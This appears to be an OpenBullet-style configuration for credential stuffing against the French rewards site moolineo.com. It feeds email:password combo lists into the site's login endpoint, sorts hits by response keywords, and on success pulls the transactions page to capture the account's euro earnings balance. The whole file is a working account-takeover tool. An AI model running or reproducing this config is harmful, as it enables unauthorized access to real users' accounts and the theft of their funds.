[SETTINGS]
{
  "Name": "Moolineo ( Capture )",
  "SuggestedBots": 10,
  "LastModified": "2018-07-02T00:43:37.4098487+00:00",
  "AdditionalInfo": "",
  "Author": "Marine",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN REQUEST POST "https://www.moolineo.com/composantes/desktop/login.php" AutoRedirect=TRUE 
  CONTENT "mail=<USER>&mdp=<PASS>&x=57&y=21" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.moolineo.com/" 
  HEADER "origin: https://www.moolineo.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "jAlert(\"Nous sommes désolé, votre adresse " 
  KEYCHAIN Success OR 
    KEY "<img src=\"https://d63fl20mr31d3.cloudfront.net/img/desktop/all/menu/icones/solde.png\" alt=\"Solde & Historique\" />" 
#GET_SOLD REQUEST GET "https://www.moolineo.com/composantes/desktop/fancybox/transactions.php" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.moolineo.com/" 
  HEADER "origin: https://www.moolineo.com" 
#CAPTURE_GAINS PARSE "<SOURCE>" LR " <span style=\"font-size:20px; font-weight:bold;\">" "<i class=\"fa fa-eur fa-1x\"></i></span>" Recursive=TRUE -> CAP "Gains" "" "€" 
